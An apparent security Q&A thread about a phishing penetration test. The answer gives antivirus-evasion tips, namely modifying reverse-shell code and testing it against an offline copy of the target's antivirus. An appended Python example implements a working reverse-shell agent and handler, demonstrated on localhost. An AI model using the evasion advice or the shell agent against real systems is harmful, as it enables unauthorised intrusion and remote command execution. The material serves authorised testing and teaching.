
So I am part of a team wherein we have to conduct a penetration testing assignment for our client. Basically, what he wants from us is to show how we can get into their system with the help of phishing, and for the PoC he wants us to show the listener which we set up.

  • My understanding here is to create an exploit with Metasploit -> set up the listener -> send the exploit to users -> make them click the attachment = Boom, we get the shell.

Idea-wise this is correct, but I am stuck at the execution.

  • How do I encode my exploit so that it doesn't get detected by the AV? Here I have tried the obvious .exe approach, which gets detected and deleted immediately. Similarly, I tried binding it with a PDF, which also got detected by the AV.
  • Secondly, I am using a dynamic IP. In order to get it working I tried no-ip, which has changed to now-dns, and created a hostname against my IP. I am not clear on what to do next; I entered the hostname as the listener IP, but how will I get the shell or the listener?
  • Suggestions for the ideal exploit in this scenario: are there any other approaches that I can consider in this case which could help in getting the desired result?

Feel free to correct me if I am wrong anyplace. I am new to this area, so I could have missed a few things.

  • Depends on the defence mechanism: macros, a client-side exploit (for example a PDF and a vulnerable PDF viewer), a website that exploits a client-side vulnerability, having the user install a plugin and trying to escalate privilege... – Silver Jan 10 '17 at 12:54


About avoiding anti-virus: It's not as simple as you may think, but here are some guidelines. First, you need to figure out which anti-virus they use. Knowing that, create a virtual machine with the same OS and anti-virus solution the client has; that will be your "testing environment" (make sure to keep this test environment disconnected from the internet, to ensure the solution will not generate a new signature and upload it to the vendor). Having done that, you can start to play with the Meterpreter encoders, which in most cases will be detected by the AV anyway. What I do recommend is writing your own exploit, so most of the anti-virus solutions that don't have sandboxing capabilities will not detect it. What I usually do is google a piece of code similar to the exploit we want (for example, searching for reverse-shell code in C) and change some parts of the code. In this way, any signature-based anti-virus will not detect it. You should always test in your testing environment.

About the dynamic IP: If you're part of a team at a serious pentest company, acquire a static IP. You can even get a VPS for $5/month and use it as your "command and control" server. Using solutions like no-ip introduces a high chance of failure.

Ricardo Reimao
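What "the listener" in the question actually is, and why the answer's static-IP advice matters, as an added example that is not part of the question or the answer above. Both halves of a callback connection run in one process on localhost: `start_listener` and `handler_session` play the operator's handler (in a real engagement, msfconsole's multi/handler on the VPS the answer suggests), and `agent_callback` plays the payload the phished user executes. The listener host, the ephemeral port, the length-prefixed framing and the command list are all constructed for the demo; nothing here is an evasion technique, and it requires Python 3.7+ for `subprocess.run(capture_output=True)`. The point to notice is the direction of the connection: the operator never reaches into the target. The payload connects *out* to the address baked into it, so a shell appears at the listener only if that address resolves to the box that is listening at the moment the user clicks.

```python
"""Callback ("reverse") connection round trip, run entirely on localhost.

Added example, not from the original question or answer. The two halves are
what the engagement's PoC consists of: a listener/handler on the operator's
box (the VPS or static IP the answer recommends) and an agent that the
phished user's machine runs, which connects back *to* the listener.
Real payloads come from msfvenom and are caught by msfconsole's
multi/handler; this toy uses plaintext TCP and a constructed command list
so the mechanism can be seen and tested offline.
"""
import socket
import struct
import subprocess
import threading

# Constructed: stands in for the operator host the agent calls back to.
LISTENER_HOST = "127.0.0.1"


def send_frame(sock, data):
    """Length-prefixed write so the peer knows where one command's output ends."""
    sock.sendall(struct.pack("!I", len(data)) + data)


def recv_exact(sock, n):
    """Read exactly n bytes or raise if the peer went away mid-frame."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-frame")
        buf += chunk
    return buf


def recv_frame(sock):
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    return recv_exact(sock, length)


def start_listener(host=LISTENER_HOST, port=0):
    """Operator side, step 1: bind and listen. port=0 lets the OS pick a free
    ephemeral port (a real handler uses the fixed port the agent was built with)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def handler_session(srv, commands):
    """Operator side, step 2: block until the victim calls back, then drive it.
    Returns (peer address, list of command outputs as text)."""
    conn, peer = srv.accept()
    outputs = []
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            outputs.append(recv_frame(conn).decode())
        conn.sendall(b"exit\n")
    return peer, outputs


def agent_callback(host, port):
    """Payload side: what runs after the phished user opens the attachment.
    It resolves `host` *now* and connects outward, which is why the agent needs
    a listener address that is still correct at the moment of the click."""
    with socket.create_connection((host, port)) as s:
        reader = s.makefile("rb")
        for line in reader:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            result = subprocess.run(cmd, shell=True, capture_output=True)
            send_frame(s, result.stdout + result.stderr)


def run_demo(commands=("echo phish-poc",)):
    """Run listener and agent in one process and return the collected outputs."""
    srv = start_listener()
    port = srv.getsockname()[1]
    agent = threading.Thread(
        target=agent_callback, args=(LISTENER_HOST, port), daemon=True
    )
    agent.start()
    try:
        _peer, outputs = handler_session(srv, list(commands))
    finally:
        srv.close()
    agent.join(timeout=5)
    return outputs


if __name__ == "__main__":
    for out in run_demo(("echo phish-poc", "uname -s")):
        print(out, end="")
```

Run it with `python3 callback_demo.py` and the handler prints what the "victim" executed. The DDNS problem from the question is visible in `agent_callback`: `socket.create_connection` resolves the hostname once, at connect time. If the dynamic IP has changed and the DDNS record has not caught up, or the client's egress filtering drops the outbound connection, the callback simply never arrives and the listener sits at `accept()` with no indication of why. That silent failure is the "high chance of failure" the answer is referring to, and a VPS with a fixed address removes the first cause (not the second).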